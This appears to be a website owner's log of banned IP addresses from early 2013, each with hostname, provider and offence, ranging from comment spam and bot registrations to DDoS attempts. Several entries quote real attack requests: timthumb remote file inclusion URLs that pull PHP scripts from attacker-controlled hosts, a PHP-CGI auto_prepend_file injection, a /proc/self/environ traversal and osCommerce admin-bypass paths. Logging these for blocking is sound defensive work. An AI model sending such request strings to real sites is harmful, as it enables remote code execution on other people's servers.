/?page=login&cmd=register
/wp-login.php?action=register
/?s=Register
/index.php?app=core&module=global&section=login
/index.php?p=member/signup
/YaBB.cgi/
YaBB.pl/
/index.php/forums/member/register
/member/join.php
/join_form.php
203.197.151.138 Hostname: gw1.corpgw.com
Company: India – Ernakulam Internet Service Provider
Direct request for info.php file
No referrer
95.108.150.235 Hostname: sticker00.yandex.ru
Host: Russian Federation – Moscow Yandex Llc
Banned Bot: YANDEX
Banned Region: RUSSIA
199.187.122.210 Company: United States Philadelphia Anton Sulistiyono
(Shared hosting server)
Attempted WordPress timthumb remote file inclusion exploit
/wp-content/themes/Quadro/scripts/timthumb.php?src=http: //flickr.com.farshidweb.com/upload.php
Blocked by firewall – banned
41.250.82.43 Company: Morocco – Casablanca Office National Des Postes Et Telecommunications Onpt (maroc Telecom)/iam Attempt to upload file
/wp-admin%2Fmedia-upload.php%3Fpost_id%3D182%26type%3Dimage%26TB_iframe
%3D1%26width%3D640%26height%3D690&reauth=1
Known Mail server and Dictionary Attacker
94.124.93.172 Hostname: keurigonline32.nl
Company: Netherlands – Groningen Cj2 Hosting&development
Attempted WordPress timthumb remote file inclusion exploit
/wp-content/plugins/really-easy-slider/inc/thumb.php?src=http: //blogger.com.izlicez.biz/byroe.php
67.225.235.134 Hostname: server.muzhda.com
Company: United States – Tampa Liquid Web Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.54.107.68 Hostname: static-173-54-107-68.nwrknj.fios.verizon.net
Company: United States – Ashburn Verizon Online Llc
User agent: Gigabot/3.0 (http: //www.gigablast.com/spider.html)
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
151.237.188.147 Company: Sweden – Stockholm Deepak Mehta Fie Bot Trying to register/login
8.30.145.190 Company: United States – Omaha Level 3 Communications Inc. Bot Trying to register/login
184.171.160.91 Company: United States – Phoenix Secured Servers Llc Comment Spammer
192.74.229.1 Company: China – Chengdu Anxin Comment and Forum Spammer
75.69.194.57 Hostname: c-75-69-194-57.hsd1.ct.comcast.net
Company: United States – Farmington Comcast Cable Communications Holdings Inc
DoS attack from this IP using Comcast Java traffic hijacker script.
/e8f6b078-0f35-11de-85c5-efc5ef23aa1f/aupm/notify.do?dispatch=checkBulletin
Attack started 01/24/2013 – 03:33 (GMT) and continued to 01/24/2013 – 05:13 (GMT)
No other traffic was able to access site during this time
This and all Comcast IPs will be denied access
Read More: Comcast caught hijacking web traffic
185.3.134.71 Company: Sweden – Stockholm Deepak Mehta Fie Trying to register/login
63.246.155.48 Hostname: hal9000.enviroweb.com.ar
Company: United States – Miami United Colocation Group Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
64.250.114.248 Company: United States – Chicago Servergurus Llc Mail Server
Malicious User Agent: Java/1.4.1_04
103.5.49.37 Company: Indonesia – Jakarta Pt. Indie Internet Solution Comment Spammer, Mail Server, Dictionary Attacker
37.72.190.153 Company: United States – Carolina Deepak Mehta Fie Comment Spammer
161.53.174.9 Hostname: www. sczg.hr
Company: Croatia – Zagreb Croatian Academic And Research Network
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
192.74.228.161 Company: United States – Sunnyvale Peg Tech Inc Comment Spammer
37.59.91.60 see next Company: France – Roubaix Ovh Systems Comment Spammer
37.113.62.81 Hostname: 37x113x62x81.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment Spammer
37.221.168.235 Company: Germany – Frankfurt Am Main Voxility S.r.l. Trying to login/register
199.87.249.91 Hostname: h-249-91.scoutjet.com
Company: United States Redwood City Blekko Inc.
Banned User Agent:
Mozilla/5.0 (compatible; Blekkobot; ScoutJet; +http: //blekko.com/about/blekkobot)
87.29.92.147 Hostname: host147-92-static.29-87-b.business.telecomitalia.it
Company: Italy Roma Telecom Italia Net
Remote file inclusion attempt
/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dhttp: //www.hoteltill.it/test.php
65.254.43.207 Hostname: gnax-vc47.simplehelix.com
Company: United States – Atlanta Global Net Access Llc
Remote file inclusion attempt
/wp-content/plugins/advanced-custom-fields/core/actions/export.php
/wp-content/plugins/advanced-custom-fields/core/actions/export.php?acf_abspath=
http: //www.goguan.net/wb_data/dor.txt???
72.233.72.155 Hostname: 155.72.233.72.static.reverse.ltdomains.com
Company: United States Kansas City Layered Technologies Inc.
Comment Spammer, Mail Server, Rule Breaker bot
216.164.170.6 Hostname: 216-164-170-6.c3-0.atw-ubr5.atw.pa.cable.rcn.com
Company: United States – Allentown Rcn Corporation
Contact form spammer
173.54.107.68 Hostname: static-173-54-107-68.nwrknj.fios.verizon.net
Company: United States Ashburn Verizon Online Llc
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php
/wponlinestore-review/2/%2B%22by+oscommerce%22++%22/shop/
admin/banner_manager.php/login.php
193.14.16.27 Hostname: c193-14-16-27.cust.tele2.se
Company: Sweden – Kista Lan Tjansten
Spammer – Found Honeypot Trap
81.44.243.134 Hostname: 134.Red-81-44-243.dynamicIP.rima-tde.net
Company: Spain – Madrid Telefonica De Espana Sau
Comment Spammer
133.242.195.179 Hostname: sb179.rwrwrw.com
Company: Japan – Sakura Rich&wise Inc.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
admin/record_company.php/password_forgotten.php
85.131.50.136 Hostname: ws136.fabsy.fi
Company: Finland – Rauma Forlags Ab Sydvastkusten
Hacker: Attempted wpOnlineStore/osCommerce/Zencart exploit and MySQL hack
/admin/sqlpatch.php/password_forgotten.php?action=execute
/admin/record_company.php/password_forgotten.php
/extras/curltest.php
211.62.35.145 Company: Korea, Republic Of – Seoul Kthitel Co. Ltd. Remote file inclusion attempt
/menu.php?root_path=http: //recycleengineering.com/itrecycle/tmp/install
_4e8971c78d252/arm7/html/com_tools/daster.jpg??
88.254.78.234 Hostname: 88.254.78.234.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Tried to access site admin
76.72.173.236 Company: United States – Philadelphia Database By Design Llc Bad request:
/’ encodeURIComponent(location.href) ‘&title=’ encodeURIComponent(document.title),
‘delicious’,’toolbar=no,width=550,height=550′); return false;
46.105.168.172 Company: France – Roubaix Ovh Systems Comment Spammer
IP is possibly used by CAPTCHA breaker.
Repeated lookup for /image_captcha/******/******
Faked referrer
111.172.129.150 Company: China – Wuhan Chinanet Hubei Province Network Brute force login/register attempt
74.221.217.198 Company: United States – Seattle Dme Hosting Llc WordPress Trackback Spammer
Malicious User Agent: PHP/5.2.10
37.1.207.22 Company: United Kingdom – London 3nt Solutions Llp Timthumb RFI script attack:
/wp-content/themes/rt_panacea_wp/thumb.php
/wp-content/themes/Memoir/thumb.php
/wp-content/themes/flashnews/thumb.php
161.53.174.10 Hostname: mail.sczg.hr
Company: Croatia – Zagreb Croatian Academic And Research Network
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/banner_manager.php/login.php
/admin/categories.php/login.php?cPath=&action=new_product_preview
/admin/banner_manager.php/login.php
24.173.94.226 see next Company: United States – Plano Road Runner Holdco Llc Trying to login/register.
Seen without User Agent
Known user agents:
Mozilla/5.0 (compatible; Ezooms/1.0; ezooms.bot@gmail.com)
Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Banned
24.173.0.0/16 Company: United States – Plano Road Runner Holdco Llc Suspected of being used by EZOOMSBOT and YANDEX
178.33.251.11 Hostname: linux .yabancidizihd.net
Company: France – Roubaix Ovh Systems
Timthumb RFI script attack:
/wp-content/themes/e-line-Edit/scripts/timthumb.php?src=http
%3A%2F%2Fblogger.com.waterpointto.com%2Fcilik.php
198.74.126.229 Hostname: 229-126-74-198-dedicated.multacom.com
Company: United States – Canyon Country Multacom Corporation
Javascript injection attempted:
190.97.204.37 Hostname: 190-97-204-37.ert.com.co
Company: Colombia – Cali Empresa De Recursos Tecnologicos S.a E.s.p
Comment Spammer – bot – found honeypot trap
142.4.98.210 Company: China – Chengdu Anxin Comment Spammer – bot – found honeypot trap
50.117.61.242 Company: United States – San Jose Detectnetwork.us Comment Spammer
195.50.30.207 Company: Belarus – Minsk Unibel Attempted Joomla exploit
//administrator/components/com_jce/jce.xml
96.44.189.102 Hostname: herngaard .torservers.net
Company: United States – Dallas Quadranet Inc
Spammer – Found Honeypot Trap
61.49.40.28 Company: China – Beijing China Unicom Beijing Province Network Spammer – Found Honeypot Trap
197.248.2.172 Hostname: 174.127.82.232.static.midphase.com
Company: Kenya – Nairobi One Communications Ltd
Timthumb script attack:
wp-content/themes/wp-newspaper/timthumb.php?src=http
%3A%2F%2Fphotobucket.com.eltrabajo.cl/bajo.php
Blocked by server security script
88.254.78.234 Hostname: 88.254.78.234.dynamic.ttnet.com.tr
Company: Turkey – Ankara Turk Telekomunikasyon Anonim Sirketi
Brute force attempt to access site admin
212.38.176.155 Company: United States – Zanesville Iomart Group Plc Multiple attempts to register/login
/register
/signup.php
/register
86.122.29.154 Hostname: 86-122-29-154.bacau.rdsnet.ro
Company: Romania – Bacau Rcs & Rds Business
Timthumb script attack:
//wp-content/themes/Minimal/timthumb.php?src=http:
//picasa.com.restoremasters.com/.test/crimecyber.php
37.1.207.22 Company: United Kingdom – London 3nt Solutions Llp Timthumb script attack:
wp-content/themes/DeepFocus/thumb.php
67.218.43.151 Hostname: server11.onecci.com
Company: United States – Scottsdale Oneneck It Services Corporation
Brute force Timthumb script attack:
//wp-content/themes/TheStyle/timthumb.php?src=http: //picasa.com.
restoremasters.com/.test/crimecyber.php
Blocked by server security script – banned
174.127.82.232 Hostname: 174.127.82.232.static.midphase.com
Company: United States – Marietta Hosting Services Inc.
Accessing disallowed folders for images
174.142.220.103 Hostname: server1.ddf.net.br
Company: Canada – Montreal Abcreg.net Limited
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
31.47.243.34 Hostname: 34.243.47.31.rdns.configcenter.info
Company: Germany – Ahrensburg Media:webline Internet Solutions Gmbh
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
72.55.179.80 Hostname: cp.dnsbytes.com
Company: Canada – Montreal Iweb Dedicated Cl
Brute force GD Star Rating/Timthumb script attack:
/wp-content/gd-star-rating/timthumb.php?src=http: //flickr.com.adrianalyradesign.com.br/bad.php
37.113.46.69 Hostname: 37x113x46x69.dynamic.penza.ertelecom.ru
Company: Russian Federation – Penza Cjsc Er-telecom Holding
Comment/Forum Spammer
50.31.10.161 Hostname: ip161.50-31-10.static.steadfastdns.net
Company: United States – Chicago Steadfast Networks
Comment Spammer
31.223.125.209 Company: Turkey – Istanbul Turknet Iletisim Hizmetleri A.s Trying to access site admin
142.54.171.242 Company: United States Kansas City 5280 Enterprises Llc. Comment Spammer
174.136.81.102 Hostname: Hypv2659.appliedi.net
Company: United States Lubbock Applied Innovations Corporation
Comment Spammer
122.155.12.113 Company: Thailand – Bangkok Cat Telecom Data Comm. Dept Idc Office Timthumb script attack
/wp-content/themes/MyProduct/timthumb.php../../../../../../../../../../../../..//proc/self
/environ%0000/&sa=U&ei=zo_3UKeNIOrhigK7uYGIDw&ved=0CLABEBYwNQ&usg=
AFQjCNFjAhJX7u6znmucIbLA6jeJb0SQmw/wp-content/theme
218.28.59.149 Hostname: pc0.zz.ha.cn
Company: China – Zhengzhou Education Bureaux
Spammer – Found Honeypot Trap
124.89.36.178 Company: China – Beijing Weinancity Ipaddresspool Spammer – Found Honeypot Trap
122.192.166.70 Company: China – Nanjing China Unicom Jiangsu Province Network Spammer – Found Honeypot Trap
83.69.16.167 Company: Russian Federation – Moscow Closed Joint Stock Company Severtranstelecom Spammer – Found Honeypot Trap
24.93.181.216 Hostname: cpe-24-93-181-216.neo.res.rr.com
Company: United States – Cleveland Road Runner Holdco Llc
Comment Spammer
64.191.117.66 Company: United States – Las Vegas Pvnt Networks Comment Spammer
1.242.111.64 Company: Korea, Republic Of – Seoul Sk Broadband Co Ltd Comment Spammer
100.43.83.135 Hostname: spider-100-43-83-135.yandex.com
Company: United States – Palo Alto Yandex Inc
User Agent: Mozilla/5.0 (compatible; YandexBot/3.0; +http: //yandex.com/bots)
Yandex Bot
180.76.5.175 Hostname: baiduspider-180-76-5-175.crawl.baidu.com
Company: China Beijing Beijing Baidu Netcom Science And Technology Co. Ltd.
Baidu Bot
Does not always identify itself as a bot e.g. UA – Mozilla/5.0 (Windows NT 5.1; rv:6.0.2)
Gecko/20100101 Firefox/6.0.2
Baidu bots are banned
5.9.112.68 Hostname: 5-9-112-68.crawler.sistrix.net
Company: Germany Nuremberg Hetzner Online Ag
User Agent:
Mozilla/5.0 (compatible; SISTRIX Crawler; http: //crawler.sistrix.net/)
Unwanted Bot / Bad Bot
46.4.94.200 Hostname: s3.jupe.pl
Company: Germany – Nuremberg Hetzner Online Ag
Fake User Agent: Googlebot/2.1 (+http: //www.googlebot.com/bot.html)
This is a Germany – Nuremberg Hetzner Online Ag IP, Not Google
Banned
216.136.28.6 Hostname: bx2.urdirect.net
Hostname: pcanywhere.twc-moldin.urdirect.net
Company: United States – San Antonio Tw Telecom Holdings Inc.
Attempted WordPress GD Star Ratings plugin / Timthumb exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security script – BANNED
91.223.16.196 Hostname: vvps-816847.dailyvps.co.uk
Company: United Kingdom – Derby Daily Internet Ltd
Comment Spammer
66.36.189.37 Hostname: weberize-egypt.com
Company: United States – Elk Grove Siteturn Networks Inc.
Comment Spammer
83.27.101.91 Hostname: axp91.neoplus.adsl.tpnet.pl
Company: Poland – Wroclaw Neostrada Plus
Comment Spammer
192.119.144.57 Company: United States – Dallas Kristina Chung Comment Spammer
62.73.112.167 Hostname: client.playtime.bg
Company: Bulgaria – Blagoevgrad Bulgarian Telecommunications Company Plc.
Comment Spammer
83.21.208.196 Hostname: elo196.neoplus.adsl.tpnet.pl
Company: Poland – Szczecin Neostrada Plus
Comment Spammer
213.221.55.78 Company: Russian Federation – Moscow Sovintel Dymov Comment Spammer
42.96.145.89 Company: China – Beijing Alibaba (beijing) Technology Co. Ltd. Comment Spammer
23.19.72.144 Company: United States – Phoenix Nobis Technology Group Phoenix Comment Spammer
81.64.221.64 Hostname: 81-64-221-64.rev.numericable.fr
Company: France Paris Nc Numericable S.a.
DDoS attack blocked by Firewall
174.127.82.214 Hostname: 174.127.82.214.static.midphase.com
Company: United States – Marietta Hosting Services Inc.
DDoS attack blocked by Firewall
141.223.5.21 Hostname: home1.postech.ac.kr
Company: Korea, Republic Of – Seoul Pohang University Of Science And Technology
Brute force attempt to post using WordPress xmlrpc
10 attempts per second
50.115.171.36 Company: United States – Los Angeles Virpus Networks Comment Spammer
41.203.208.5 Hostname: cpanel01.safaricombusiness.co.ke
Company: Kenya – Nairobi This Is For Fixed Wimax For Corporate Customers
Attempted WordPress GD Star Ratings plugin / Timthumb exploit:
/wp-content/gd-star-rating/timthumb.php?src=http: //picasa.com.tvd-online.org/stunxx.php
174.142.90.175 Company: Canada – Montreal Iweb Dedicated Cl Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security scripts – Banned
212.100.249.92 Hostname: 314227-web1.accountz.com
Company: United States – San Antonio Rackspace.com
Attempted WordPress GD Star Ratings plugin exploit:
//wp-content/gd-star-rating/?src=http: //picasa.com.restoremasters.com/.test/crimecyber.php
Blocked by security scripts – Banned
195.62.25.214 Company: Ukraine – Kharkiv Megacom Comment Spammer:
Found Honeypot Trap
203.162.0.78 Hostname: m78.vnn.vn
Company: Viet Nam – Ha Noi Vietnam Data Communication Company
Attempted timthumb exploit
/wp-content/themes/TheStyle/timthumb.php?src=http
%3A%2F%2Fimg.youtube.com.cicadex.com%2Fbad.php
IP known to be used for DDoS attacks
142.4.208.171 Hostname: ks4003092.ip-142-4-208.net
Company: Canada – Montreal Ovh Hosting Inc.
DoS attacker.
/index.php?option=com_user&view=reset&layout=confirm
IP blocked by firewall after single event
No User Agent, No Referrer
93.182.137.30 Hostname: anon-137-30.relakks.com
Company: Sweden – Lund Viaeuropa I Lund Ab
Javascript Injection attack via WordPress Comment system
Blocked by firewall
64.91.232.42 Company: United States – Portland Liquid Web Inc. Unwanted / Bad Bot
PopScreenBot
Content scraper for videos – plagiarist/embedder
81.145.59.123 Company: United Kingdom – Newport Central Trust Plc Comment Spammer
83.21.206.206 Hostname: elm206.neoplus.adsl.tpnet.pl
Company: Poland – Szczecin Neostrada Plus
Mail Server and Comment Spammer
213.136.36.251 Hostname: h-213-136-36-251.na.cust.bahnhof.se
Company: Sweden – Stockholm Bahnhof Internet Ab
Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/categories.php/login.php?action=new_product_preview&cPath
156.25.4.2 Company: Switzerland – Fribourg Administration Cantonale De Fribourg Looking for non-existent URLs
/notified-SplashPage_FR?aHR0cDovL3Nob3AuZ3JhcGhpY2xpbmUuY28uemEvcHJvZHVjdC9taWNy
b3NvZnQtdmlzaW8tMjAxMC1wcm9mZXNzaW9uYWwv
/verify-SplashPage_FR?aHR0cDovL3Nob3AuZ3JhcGhpY2xpbmUuY28uemEvcHJvZHVjdC9taWNy
b3NvZnQtdmlzaW8tMjAxMC1wcm9mZXNzaW9uYWwv
151.237.188.140 Company: Sweden – Stockholm Deepak Mehta Fie WordPress Trackback Spammer
217.171.58.106 Hostname: 106.217-171-58.tkchopin.pl
Company: Poland – Wejherowo Telewizja Kablowa Chopin Bogdan Laga Dariusz Schmidtke Spolka Jawna
Comment Spammer
66.49.199.112 Hostname: host17.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.maxg.ro/indek.php
66.49.223.233 Hostname: host168.canaca.com
Company: Canada – Mississauga Canaca-com Inc.
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.playteck.net/indeks.php
64.59.72.155 Company: United States – New York City Mojohost Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.playteck.net/indek.php
50.63.154.219 Hostname: ip-50-63-154-219.ip.secureserver.net
Company: United States Scottsdale Godaddy.com Llc
Attempted timthumb exploit
/wp-content/themes/Minimal/timthumb.php?src=http%3A%2F%2Fpicasa.com.maxg.ro/indek.php
108.62.215.114 Hostname: 108.62.215.114.rdns.ubiquityservers.com
United States – Dallas Nobis Technology Group Llc
Trying to login/register on restricted site
/?q=user/register
Comment Spammer
Bad Host: Dallas Nobis Technology Group
142.91.79.13 Hostname: 142.91.79.13.rdns.ubiquity.io
Company: United States – Los Angeles Ubiquity Server Solutions Los Angeles
Comment Spammer
31.192.215.181 Hostname: 181ntd2wa.ni.net.tr
Company: Turkey – Denizli Netinternet Bilgisayar Ve Telekomunikasyon San. Ve Tic. Ltd. Sti.
Timthumb remote file inclusion attempt:
/wp-content/plugins/extend-wordpress/helpers/thumb.php
METHOD: GET
/&amp;sa=U&amp;ei=oCP1UNKdKMa2hAeB7oH4DA&amp;ved=0CBQQFjAAOLwF&amp;usg=AFQjCNECnXssk5sPOFXDUkaH561DPF2foQ/wp-content/plugins/extend-
wordpress/helpers/thumb.php
87.101.137.99 see next Company: Saudi Arabia – Riyadh Integrated Telecom Co. Ltd Trying to login/register on restricted site
/?q=user/register
Known Mail Server, Dictionary Attacker and Comment Spammer
141.255.164.73 Company: Switzerland – Bern Red Transit Llc Comment Spammer
141.255.167.103 Company: Switzerland – Bern Red Transit Llc Comment Spammer
173.234.250.79 Hostname: 173-234-250-79.ipvnow.com
Company: United States – West Hollywood Squid Media Llc
Comment Spammer
67.202.91.116 Company: United States – Chicago Steadfast Networks Trying to login/register on restricted site
/?q=user/register
64.87.61.102 Hostname: 64.87.61.102.rdns.ubiquityservers.com
Company: United States – Grand Prairie Colocateusa
Trying to login/register on restricted site
/?q=user/register
197.220.97.2 Company: Kenya – Mombasa Simbanet Com (k) Ltd Attempted wpOnlineStore/osCommerce/Zencart exploit:
/admin/file_manager.php/login.php?src=http
%3A%2F%2Fblogger.com.thejumperguys.com%2Fbad.php
184.22.50.184 Hostname: 184-22-50-184.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Trying to login/register on restricted site
/?q=user/register
216.151.130.36 Company: United States – Santa Monica Xeex Comment Spammer
121.54.32.156 Company: Philippines – Makati Smart Broadband Incorporated Mail Server / Dictionary Attacker / Comment Spammer
Found honeypot trap
190.186.229.58 Hostname: dynamic-ip-cablemodem-190.186.229.58.cotas.com.bo
Company: Bolivia – Plurinational State Of Santa Cruz De La Sierra Cotas Ltda.
Comment Spammer
184.82.110.2 Hostname: 184-82-110-2.static.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
Trying to login/register on restricted site
/?q=user/register
147.255.162.108 Hostname: 147.255.162.108.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Trying to login/register on restricted site
/?q=user/register
194.71.225.104 Company: Sweden – Stockholm Iehavoc Ab Comment Spammer
46.227.71.192 Hostname: 46-227-71-192.static.obenetwork.net
Company: Sweden – Sundbyberg Obenetwork Ab
Comment Spammer
128.73.237.105 Hostname: 128-73-237-105.broadband.corbina.ru
Company: Russian Federation – Moscow Dynamic Ip Pool For Broadband Customers
Comment Spammer
74.208.162.242 Hostname: sys101.emailling.net
Company: United States – Wayne 1&1 Internet Inc.
Comment Spammer
75.101.181.182 Hostname: ec2-75-101-181-182.compute-1.amazonaws.com
Company: United States – Ashburn Amazon.com Inc.
Malicious User Agent:
Java/1.6.0_27
59.39.218.185 Company: China – Guangzhou Chinanet Guangdong Province Network Attempting to post content/comment with direct lookup.
/submit.php
No other pages got, no referrer
54.232.31.196 Hostname: ec2-54-232-31-196.sa-east-1.compute.amazonaws.com
Company: Brazil – Sao Paulo Amazon.com Inc.
Comment Spammer
125.216.144.199 Company: China – Beijing Guangzhou Auto College South China University Of Technology Comment Spammer
64.237.37.8 Hostname: 64-237-37-8.reliableservers.com
Company: United States – Newark Choopa Llc
Trying to login/register on restricted site
/?q=user/register
62.28.148.20 Company: Portugal – Lisbon Pt Prime – Solucoes Empresariais Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
173.0.52.159 Hostname: penguin.reachstuff.com
Company: United States – Kansas City Dnsslave.com
Comment Spammer
Posted links to http: //www dot semanarionatural.com/pastillas-para-adelgazar-naturales/
204.236.166.218 Hostname: ec2-204-236-166-218.us-west-1.compute.amazonaws.com
Company: United States – San Francisco Amazon.com Inc.
Banned User Agent:
JS-Kit URL Resolver, http: //js-kit.com/
217.118.79.29 Company: Russian Federation – Novosibirsk Ojsc Vimpelcom Rogue bot: Mozilla/5.0 (compatible; 008/0.85; http //www.80legs.com/webcrawler.html)
Gecko/2008032620
173.212.198.43 Hostname: 173-212-199-43.hostnoc.net
Company: United States – Scranton Network Operations Center Inc.
UA: Mozilla/5.0 (compatible; OnetSzukaj/5.0; http: //szukaj.onet.pl)
Comment Spammer – direct request for /wp-comments-post.php
142.0.34.145 Company: United States – Scranton Volumedrive Trying to login/register on restricted site
/?q=user/register
222.177.230.67 Company: China – Chongqing Chinanet Chongqing Province Network Trying to login/register on restricted site
/?q=user/register
218.204.131.250 Company: China – Beijing China Mobile Communications Corporation – Jiangxi Comment Spammer
Found Honeypot Trap
124.193.202.18 Company: China – Beijing Beijing Zhongbangyatong Telecom Technology Co Ltd Comment Spammer
Found Honeypot Trap
166.90.142.9 Hostname: nat.kosmix. com
Company: United States – Mountain View Cosmix Corporation
DDoS attack blocked by Firewall
23.19.171.228 Hostname: 23.19.171.228.rdns.ubiquity.io
Company: United States – Seattle Ubiquity Server Solutions Seattle
Comment Spammer
74.221.212.36 Company: United States – Seattle Dme Hosting Llc Comment Spammer
108.178.130.197 Hostname: rrcs-108-178-130-197.west.biz.rr. com
Company: United States – Clarksburg Road Runner Holdco Llc
Comment Spammer
216.187.95.254 Hostname: peer1-carp-ext.gfed. net
Company: Canada – Richmond 3336 Investments Ltd.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
85.234.39.219 Hostname: m5-ural.ru
Company: Russian Federation – Moscow Cjsc Comstar-regions
Comment Spammer.
Looking for index.php files in folders
74.125.184.16 Company: United States – Mountain View Google Inc. Comment Spammer
194.71.224.34 Company: Sweden – Stockholm Iehavoc Ab Trying to register on restricted site
/?q=user/register
/user/register
8.18.120.121 Company: United States – Omaha Level 3 Communications Inc. Trying to register on restricted site
/?q=user/register
/user/register
142.0.44.147 Company: United States – Scranton Volumedrive Javascript injection attack blocked by firewall
85.214.107.235 Hostname: h1648427.stratoserver.net
Company: Germany – Berlin Strato Ag
Timthumb remote file inclusion attack
/wp-content/themes/sportpress/scripts/timthumb.php?src=http
%3A%2F%2Fflickr.com.thedoginnludham.co.uk%2Fsimple.php
61.221.117.244 Hostname: 61-221-117-244.HINET-IP.hinet.net
Company: Taiwan – Taipei Data Communication Business Group Chunghwa Telecom Co. Ltd.
Mail Server.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
84.253.190.188 Hostname: net84-253-190-188.mclink.it
Company: Italy – Roma Mc-link Spa
Longest User Agent I’ve seen: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12″,”Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4″,”Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/540.0 (KHTML,like Gecko) Chrome/9.1.0.0 Safari/540.0″,”Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.
Attempted wpOnlineStore/osCommerce/Zencart exploit:
//admin/categories.php/login.php?cPath=&action=new_product_preview
admin/banner_manager.php/login.php
/admin/file_manager.php/login.php
217.218.62.246 Company: Iran, Islamic Republic Of – Tehran Iran Telecommunication Research Center Itr
User Agent ID: parsijoo
Rule Breaker
Bad Bot
184.107.230.34 Hostname: ns3.cheatsbrasil. org
Company: Canada – Montreal Alessandre De Moura Cavalcante
Remote file inclusion attempt:
/fancygalleryhttp: //flickr.com.soluteq.com/bot.txt??
{URL}&amp;sa=U&amp;ei=e2nqUKLbDq2L4gTM1YGgBg&amp;ved=
0CH4QFjAp&amp;usg=AFQjCNHLDaQJJBOT8m3PlD9vxE6-fN0QXA/fancygallerytest??
/fancygallerytest??
8.18.120.128 Company: United States – Omaha Level 3 Communications Inc. Trying to register on restricted site
/?q=user/register
/user/register
80.243.190.251 Hostname: 251-190-243-80.rackcentre.redstation.net.uk
Company: United Kingdom – Gosport Redstation Limited
Trying to register on restricted site
/?q=user/register
/user/register
173.234.196.142 Company: United States – Chicago Ubiquity Server Solutions Chicago Trying to register on restricted site
/?q=user/register
/user/register
64.34.204.236 Company: United States – Los Angeles H4y Technologies Llc Trying to register on restricted site
/?q=user/register
/user/register
218.28.140.186 Company: China – Zhengzhou Sanhkjsy Corp Trying to login to WordPress on restricted site
173.212.212.10 Hostname: 173-212-212-10.static.hostnoc. net
Company: United States – Scranton Network Operations Center Inc.
Comment Spammer – direct POST event to /wp-comments-post.php
No referrer
UA: Mozilla/4.76 [en] (X11; U; SunOS 5.7 sun4u)
76.74.220.247 Company: United States – Los Angeles H4y Technologies Llc Trying to register on restricted site
/?q=user/register
/user/register
61.181.22.157 Company: China – Tianjin China Unicom Tianjin Province Network Comment Spammer / Rule Breaker
Found honeypot trap
219.92.235.93 Hostname: aar-235-93.tm.net.my
Company: Malaysia – Kuala Lumpur Tmnet
Comment Spammer – Mail Server
41.222.14.162 Company: Kenya – Nairobi Jamii Telecommunications Limited Mail Server, Comment Spammer / Dictionary Attacker
91.103.29.121 Hostname: gta.am
Company: Armenia – Yerevan Armenian Datacom Company
Comment Spammer / Mail Server
Direct lookup for /wp-comments-post.php
216.152.252.67 Hostname: unknown.xeex.net
Company: United States – Santa Monica Xeex
Trying to login/register on restricted site
/?q=user/register
93.174.93.145 Hostname: hosted-by.ecatel.net
Company: Netherlands – Den Haag Ecatel Ltd
Trying to login/register on restricted site
/?q=user/register
147.255.162.113 Hostname: 147.255.162.113.rdns.ubiquity.io
Company: United States – Phoenix Nobis Technology Group Phoenix
Trying to login/register on restricted site
/?q=user/register
209.0.51.37 Company: United States – Omaha Level 3 Communications Inc. Trying to login/register on restricted site
/?q=user/register
69.30.243.122 Hostname: mx4.lintpm.com
Company: United States – Kansas City Nick Koronzo
Malicious User Agent: curl/7.21.0 (x86_64-pc-linux-gnu) libcurl/7.21.0
OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.15 libssh2/1.2.6
195.228.100.195 Hostname: C3E464C3.ip.adsl.hu
